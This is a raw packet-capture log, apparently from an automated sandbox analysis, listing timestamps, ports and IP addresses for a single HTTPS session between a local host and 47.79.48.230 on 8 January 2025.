                                                                                  Jan 8, 2025 07:15:06.094820976 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.094836950 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.094917059 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.094926119 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.094969034 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.105432034 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.105453014 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.105499983 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.105510950 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.105566978 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.115225077 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.115258932 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.115298986 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.115305901 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.115324020 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.115406990 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.128859997 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.128875971 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.128918886 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.128928900 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.128952026 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.129123926 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.138190031 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.138206959 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.138250113 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.138257980 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.138293982 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.138305902 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.149615049 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.149631977 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.149687052 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.149698019 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.149741888 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.159066916 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.159084082 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.159138918 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.159149885 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.159280062 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.170573950 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.170593977 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.170650005 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.170658112 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.170720100 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.181734085 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.181757927 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.181822062 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.181829929 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.182024956 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.192521095 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.192542076 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.192608118 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.192620039 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.192666054 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.202054024 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.202071905 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.202148914 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.202158928 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.202243090 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.215521097 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.215536118 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.215581894 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.215589046 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.215639114 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.225270033 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.225285053 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.225333929 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.225342035 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.225385904 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.236790895 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.236805916 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.236860991 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.236870050 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.236957073 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.245937109 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.245950937 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.246000051 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.246011972 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.246049881 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.246061087 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.257380009 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.257395983 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.257517099 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.257528067 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.259103060 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.268603086 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.268625021 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.268672943 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.268680096 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.268984079 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.279330969 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.279345989 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.279460907 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.279473066 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.279695034 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.288954020 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.288969994 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.289033890 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.289041042 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.289092064 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.308852911 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.308868885 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.308928013 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.308937073 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.308979988 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.312288046 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.312303066 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.312381983 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.312390089 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.312613010 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.323479891 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.323493958 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.323563099 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.323571920 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.323622942 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.332804918 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.332819939 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.332880974 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.332895041 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.332947969 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.344338894 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.344353914 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.344472885 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.344482899 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.344520092 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.355459929 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.355474949 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.355537891 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.355547905 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.355618954 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.366301060 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.366316080 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.366403103 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.366425037 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.366677999 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.379631042 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.379646063 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.379705906 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.379723072 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.379929066 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.395832062 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.395847082 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.395908117 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.395921946 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.396023989 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.399120092 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.399135113 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.399188995 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.399200916 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.399233103 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.399247885 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.410398006 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.410412073 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.410458088 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.410469055 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.410590887 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.419764042 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.419779062 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.419883013 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.419895887 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.419960022 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.431478977 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.431504965 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.431552887 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.431564093 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.431588888 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.431607962 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.442504883 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.442523003 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.442572117 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.442585945 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.442608118 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.442620993 CET49732443192.168.2.447.79.48.230
                                                                                  Jan 8, 2025 07:15:06.453207970 CET4434973247.79.48.230192.168.2.4
                                                                                  Jan 8, 2025 07:15:06.453231096 CET4434973247.79.48.230192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Jan 8, 2025 07:15:06.453335047 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.453335047 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.453349113 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.453383923 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.466528893 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.466545105 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.466625929 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.466641903 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.466861010 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.482880116 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.482894897 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.482949018 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.482975006 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.482990980 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.483043909 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.486032009 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.486051083 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.486114025 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.486121893 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.486186981 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.497327089 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.497343063 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.497414112 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.497421980 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.497494936 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.506691933 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.506706953 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.506761074 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.506769896 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.506912947 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.518203020 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.518223047 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.518284082 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.518292904 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.518321991 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.518341064 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.529201984 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.529217005 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.529270887 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.529279947 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.529395103 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.540307045 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.540322065 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.540376902 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.540385962 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.540396929 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.540422916 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.553445101 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.553464890 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.553512096 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.553522110 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.553539038 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.553556919 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.569689035 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.569704056 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.569777966 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.569787025 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.569864035 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.573095083 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.573108912 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.573179007 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.573188066 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.573327065 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.584235907 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.584250927 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.584350109 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.584362984 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.587480068 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.593647003 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.593663931 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.593718052 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.593727112 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.593751907 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.593774080 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.605086088 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.605107069 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.605175972 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.605185986 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.605252028 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.616276979 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.616291046 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.616348982 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.616357088 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.616610050 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.627162933 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.627178907 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.627243042 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.627252102 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.627300978 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.640304089 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.640320063 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.640377998 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.640384912 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.640412092 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.640430927 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.656591892 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.656606913 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.656671047 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.656678915 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.656761885 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.659820080 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.659836054 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.659883976 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.659890890 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.659933090 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.671180964 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.671200991 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.671279907 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.671288013 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.671345949 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.680603027 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.680618048 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.680675030 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.680681944 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.680695057 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.680716991 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.692508936 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.692523956 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.692569971 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.692594051 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.692610979 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.692629099 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.703140020 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.703155041 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.703208923 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.703222990 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.703260899 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.714193106 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.714207888 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.714241982 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.714289904 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.714298010 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.714488983 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.727442980 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.727457047 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.727513075 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.727541924 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.727557898 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.727907896 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.743585110 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.743603945 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.743666887 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.743675947 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.743925095 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.746906042 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.746933937 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.746968031 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.746973991 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.747008085 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.747024059 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.757950068 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.757970095 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.758039951 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.758049011 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.758112907 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.767385006 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.767400980 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.767457008 CET  49732        443        192.168.2.4   47.79.48.230
Jan 8, 2025 07:15:06.767499924 CET  443          49732      47.79.48.230  192.168.2.4
Jan 8, 2025 07:15:06.767518997 CET  49732        443        192.168.2.4   47.79.48.230
